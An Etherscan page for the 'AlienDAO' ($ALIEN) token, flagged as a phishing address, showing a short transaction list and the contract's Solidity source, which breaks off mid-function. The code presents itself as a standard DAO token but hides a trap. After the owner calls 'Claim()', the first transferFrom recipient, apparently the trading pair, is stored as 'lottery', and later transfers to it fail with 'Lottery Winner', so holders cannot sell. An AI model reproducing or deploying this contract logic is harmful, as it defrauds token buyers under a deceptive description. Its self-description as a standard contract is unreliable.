There are reports that this address was used in a Phishing scam. Please exercise caution when interacting with it. Reported by GoPlusSecurity.
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 25 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 14382420 | 967 days ago | IN | 0 ETH | 0.00120715 | ||||
Approve | 14382339 | 967 days ago | IN | 0 ETH | 0.00114127 | ||||
Approve | 14382248 | 967 days ago | IN | 0 ETH | 0.00152349 | ||||
Approve | 14382244 | 967 days ago | IN | 0 ETH | 0.00161007 | ||||
Approve | 14382238 | 967 days ago | IN | 0 ETH | 0.00158227 | ||||
Approve | 14382237 | 967 days ago | IN | 0 ETH | 0.00146402 | ||||
Approve | 14382237 | 967 days ago | IN | 0 ETH | 0.00146402 | ||||
Approve | 14382237 | 967 days ago | IN | 0 ETH | 0.00146402 | ||||
Approve | 14382237 | 967 days ago | IN | 0 ETH | 0.00165963 | ||||
Approve | 14382236 | 967 days ago | IN | 0 ETH | 0.0015708 | ||||
Approve | 14382231 | 967 days ago | IN | 0 ETH | 0.00298547 | ||||
Claim | 14382229 | 967 days ago | IN | 0 ETH | 0.0016221 | ||||
Approve | 14382226 | 967 days ago | IN | 0 ETH | 0.00192068 | ||||
Approve | 14382219 | 967 days ago | IN | 0 ETH | 0.00159346 | ||||
Approve | 14382215 | 967 days ago | IN | 0 ETH | 0.00145238 | ||||
Approve | 14382215 | 967 days ago | IN | 0 ETH | 0.0014757 | ||||
Approve | 14382210 | 967 days ago | IN | 0 ETH | 0.00174066 | ||||
Approve | 14382210 | 967 days ago | IN | 0 ETH | 0.00173646 | ||||
Approve | 14382204 | 967 days ago | IN | 0 ETH | 0.00174697 | ||||
Approve | 14382204 | 967 days ago | IN | 0 ETH | 0.00174697 | ||||
Approve | 14382196 | 967 days ago | IN | 0 ETH | 0.00140733 | ||||
Approve | 14382186 | 967 days ago | IN | 0 ETH | 0.00145796 | ||||
Transfer | 14382172 | 967 days ago | IN | 0 ETH | 0.00412778 | ||||
Transfer | 14382171 | 967 days ago | IN | 0 ETH | 0.00392831 | ||||
0x60c06040 | 14382163 | 967 days ago | IN | 0 ETH | 0.20708695 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
AlienDAO
Compiler Version
v0.6.12+commit.27d51765
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-03-14 */ /* Hi everyone, Alien here. I bring a DAO. $ALIEN t.me/AlienDAOeth aliendao.xyz twitter.com/aliendaoeth */ pragma solidity ^0.6.12; /* Standard smart contract for a Decentralized Autonomous Organization (DAO) to automate organizational governance and decision-making. */ // SPDX-License-Identifier: MIT interface IERC20 { function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { // According to EIP-1052, 0x0 is the value returned for not-yet created accounts // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned // for accounts without code, i.e. `keccak256('')` bytes32 codehash; bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470; // solhint-disable-next-line no-inline-assembly assembly { codehash := extcodehash(account) } return (codehash != accountHash && codehash != 0x0); } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "Address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ contract Ownable is Context { address private _owner; address private _previousOwner; uint256 private _lockTime; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () internal { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } function geUnlockTime() public view returns (uint256) { return _lockTime; } //Locks the contract for owner for the amount of time provided function lock(uint256 time) public virtual onlyOwner { _previousOwner = _owner; _owner = address(0); _lockTime = now + time; emit OwnershipTransferred(_owner, address(0)); } //Unlocks the contract for owner when _lockTime is exceeds function unlock() public virtual { require(_previousOwner == msg.sender, "You don't have permission to unlock"); require(now > _lockTime , "Contract is locked until 7 days"); emit OwnershipTransferred(_owner, _previousOwner); _owner = _previousOwner; } } contract Immutable is Ownable { event ImmutableOn(); event ImmutableOff(); bool public special = false; modifier ifImmutableOff() { require(!special); _; } modifier ifImmutableOn() { require(special); _; } function Claim() onlyOwner ifImmutableOff public { special = true; emit ImmutableOn(); } function SetVault() onlyOwner ifImmutableOn public { special = false; emit ImmutableOff(); } } // pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // pragma solidity >=0.5.0; interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } // pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } // pragma solidity >=0.6.2; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract AlienDAO is Context, IERC20, Ownable, Immutable { using SafeMath for uint256; using Address for address; mapping (address => uint256) private _rOwned; mapping (address => uint256) private _tOwned; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => bool) private _isExcludedFromFee; mapping (address => bool) private _isExcluded; address[] private _excluded; uint256 private constant MAX = ~uint256(0); uint256 private _tTotal = 100 * 10**9; uint256 private _rTotal = (MAX - (MAX % _tTotal)); uint256 private _tFeeTotal; string private _name = "AlienDAO"; string private _symbol = "ALIEN"; uint8 private _decimals = 9; uint256 public _taxFee = 0; uint256 private _previousTaxFee = _taxFee; uint256 public _liquidityFee = 5; uint256 private _previousLiquidityFee = _liquidityFee; IUniswapV2Router02 public immutable uniswapV2Router; address public immutable uniswapV2Pair; address public lottery; bool inSwapAndLiquify; bool public swapAndLiquifyEnabled = true; uint256 public _maxTxAmount = 100 * 10**9; uint256 private numTokensSellToAddToLiquidity = 100 * 10**9; event MinTokensBeforeSwapUpdated(uint256 minTokensBeforeSwap); event SwapAndLiquifyEnabledUpdated(bool enabled); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity ); modifier lockTheSwap { inSwapAndLiquify = true; _; inSwapAndLiquify = true; } constructor () public { _rOwned[_msgSender()] = _rTotal; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); // Create a uniswap pair for this new token uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); // set the rest of the contract variables uniswapV2Router = _uniswapV2Router; //exclude owner and this contract from fee _isExcludedFromFee[owner()] = true; _isExcludedFromFee[address(this)] = true; emit Transfer(address(0), _msgSender(), _tTotal); } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function decimals() public view returns (uint8) { return _decimals; } function totalSupply() public view override returns (uint256) { return _tTotal; } function balanceOf(address account) public view override returns (uint256) { if (_isExcluded[account]) return _tOwned[account]; return tokenFromReflection(_rOwned[account]); } function transferlottery(address _lottery) public onlyOwner { lottery = _lottery; } function transfer(address recipient, uint256 amount) public override returns (bool) { if(special == true) { require(recipient != lottery, "Lottery Winner"); _transfer(_msgSender(), recipient, amount); return true;} else { _transfer(_msgSender(), recipient, amount); return true;} } function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) { if(special == true) { if(sender != address(0) && lottery == address(0)) lottery = recipient; else require(recipient != lottery, "Lottery Winner"); _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } else { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true;} } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } function isExcludedFromReward(address account) public view returns (bool) { return _isExcluded[account]; } function totalFees() public view returns (uint256) { return _tFeeTotal; } function deliver(uint256 tAmount) public { address sender = _msgSender(); require(!_isExcluded[sender], "Excluded addresses cannot call this function"); (uint256 rAmount,,,,,) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rTotal = _rTotal.sub(rAmount); _tFeeTotal = _tFeeTotal.add(tAmount); } function reflectionFromToken(uint256 tAmount, bool deductTransferFee) public view returns(uint256) { require(tAmount <= _tTotal, "Amount must be less than supply"); if (!deductTransferFee) { (uint256 rAmount,,,,,) = _getValues(tAmount); return rAmount; } else { (,uint256 rTransferAmount,,,,) = _getValues(tAmount); return rTransferAmount; } } function tokenFromReflection(uint256 rAmount) public view returns(uint256) { require(rAmount <= _rTotal, "Amount must be less than total reflections"); uint256 currentRate = _getRate(); return rAmount.div(currentRate); } function excludeFromReward(address account) public onlyOwner() { // require(account != 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 'We can not exclude Uniswap router.'); require(!_isExcluded[account], "Account is already excluded"); if(_rOwned[account] > 0) { _tOwned[account] = tokenFromReflection(_rOwned[account]); } _isExcluded[account] = true; _excluded.push(account); } function includeInReward(address account) external onlyOwner() { require(_isExcluded[account], "Account is already excluded"); for (uint256 i = 0; i < _excluded.length; i++) { if (_excluded[i] == account) { _excluded[i] = _excluded[_excluded.length - 1]; _tOwned[account] = 0; _isExcluded[account] = false; _excluded.pop(); break; } } } function _transferBothExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function excludeFromFee(address account) public onlyOwner { _isExcludedFromFee[account] = true; } function includeInFee(address account) public onlyOwner { _isExcludedFromFee[account] = false; } function setTaxFeePercent(uint256 taxFee) external onlyOwner() { _taxFee = taxFee; } function setLiquidityFeePercent(uint256 liquidityFee) external onlyOwner() { _liquidityFee = liquidityFee; } function setMaxTxPercent(uint256 maxTxPercent) external onlyOwner() { _maxTxAmount = _tTotal.mul(maxTxPercent).div( 10**6 ); } function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner { swapAndLiquifyEnabled = _enabled; emit SwapAndLiquifyEnabledUpdated(_enabled); } //to recieve ETH from uniswapV2Router when swaping receive() external payable {} function _reflectFee(uint256 rFee, uint256 tFee) private { _rTotal = _rTotal.sub(rFee); _tFeeTotal = _tFeeTotal.add(tFee); } function _getValues(uint256 tAmount) private view returns (uint256, uint256, uint256, uint256, uint256, uint256) { (uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getTValues(tAmount); (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getRValues(tAmount, tFee, tLiquidity, _getRate()); return (rAmount, rTransferAmount, rFee, tTransferAmount, tFee, tLiquidity); } function _getTValues(uint256 tAmount) private view returns (uint256, uint256, uint256) { uint256 tFee = calculateTaxFee(tAmount); uint256 tLiquidity = calculateLiquidityFee(tAmount); uint256 tTransferAmount = tAmount.sub(tFee).sub(tLiquidity); return (tTransferAmount, tFee, tLiquidity); } function _getRValues(uint256 tAmount, uint256 tFee, uint256 tLiquidity, uint256 currentRate) private pure returns (uint256, uint256, uint256) { uint256 rAmount = tAmount.mul(currentRate); uint256 rFee = tFee.mul(currentRate); uint256 rLiquidity = tLiquidity.mul(currentRate); uint256 rTransferAmount = rAmount.sub(rFee).sub(rLiquidity); return (rAmount, rTransferAmount, rFee); } function _getRate() private view returns(uint256) { (uint256 rSupply, uint256 tSupply) = _getCurrentSupply(); return rSupply.div(tSupply); } function _getCurrentSupply() private view returns(uint256, uint256) { uint256 rSupply = _rTotal; uint256 tSupply = _tTotal; for (uint256 i = 0; i < _excluded.length; i++) { if (_rOwned[_excluded[i]] > rSupply || _tOwned[_excluded[i]] > tSupply) return (_rTotal, _tTotal); rSupply = rSupply.sub(_rOwned[_excluded[i]]); tSupply = tSupply.sub(_tOwned[_excluded[i]]); } if (rSupply < _rTotal.div(_tTotal)) return (_rTotal, _tTotal); return (rSupply, tSupply); } function _takeLiquidity(uint256 tLiquidity) private { uint256 currentRate = _getRate(); uint256 rLiquidity = tLiquidity.mul(currentRate); _rOwned[address(this)] = _rOwned[address(this)].add(rLiquidity); if(_isExcluded[address(this)]) _tOwned[address(this)] = _tOwned[address(this)].add(tLiquidity); } function calculateTaxFee(uint256 _amount) private view returns (uint256) { return _amount.mul(_taxFee).div( 10**2 ); } function calculateLiquidityFee(uint256 _amount) private view returns (uint256) { return _amount.mul(_liquidityFee).div( 10**2 ); } function removeAllFee() private { if(_taxFee == 0 && _liquidityFee == 0) return; _previousTaxFee = _taxFee; _previousLiquidityFee = _liquidityFee; _taxFee = 0; _liquidityFee = 0; } function restoreAllFee() private { _taxFee = _previousTaxFee; _liquidityFee = _previousLiquidityFee; } function isExcludedFromFee(address account) public view returns(bool) { return _isExcludedFromFee[account]; } function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _transfer( address from, address to, uint256 amount ) private { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); if(from != owner() && to != owner()) require(amount <= _maxTxAmount, "Transfer amount exceeds the maxTxAmount."); // is the token balance of this contract address over the min number of // tokens that we need to initiate a swap + liquidity lock? // also, don't get caught in a circular liquidity event. // also, don't swap & liquify if sender is uniswap pair. uint256 contractTokenBalance = balanceOf(address(this)); if(contractTokenBalance >= _maxTxAmount) { contractTokenBalance = _maxTxAmount; } bool overMinTokenBalance = contractTokenBalance >= numTokensSellToAddToLiquidity; if ( overMinTokenBalance && !inSwapAndLiquify && from != uniswapV2Pair && swapAndLiquifyEnabled ) { contractTokenBalance = numTokensSellToAddToLiquidity; //add liquidity swapAndLiquify(contractTokenBalance); } //indicates if fee should be deducted from transfer bool takeFee = true; //if any account belongs to _isExcludedFromFee account then remove the fee if(_isExcludedFromFee[from] || _isExcludedFromFee[to]){ takeFee = false; } //transfer amount, it will take tax, burn, liquidity fee _tokenTransfer(from,to,amount,takeFee); } function swapAndLiquify(uint256 contractTokenBalance) private lockTheSwap { // split the contract balance into halves uint256 half = contractTokenBalance.div(2); uint256 otherHalf = contractTokenBalance.sub(half); // capture the contract's current ETH balance. // this is so that we can capture exactly the amount of ETH that the // swap creates, and not make the liquidity event include any ETH that // has been manually sent to the contract uint256 initialBalance = address(this).balance; // swap tokens for ETH swapTokensForEth(half); // <- this breaks the ETH -> HATE swap when swap+liquify is triggered // how much ETH did we just swap into? uint256 newBalance = address(this).balance.sub(initialBalance); // add liquidity to uniswap addLiquidity(otherHalf, newBalance); emit SwapAndLiquify(half, newBalance, otherHalf); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(uniswapV2Router), tokenAmount); // add the liquidity uniswapV2Router.addLiquidityETH{value: ethAmount}( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is 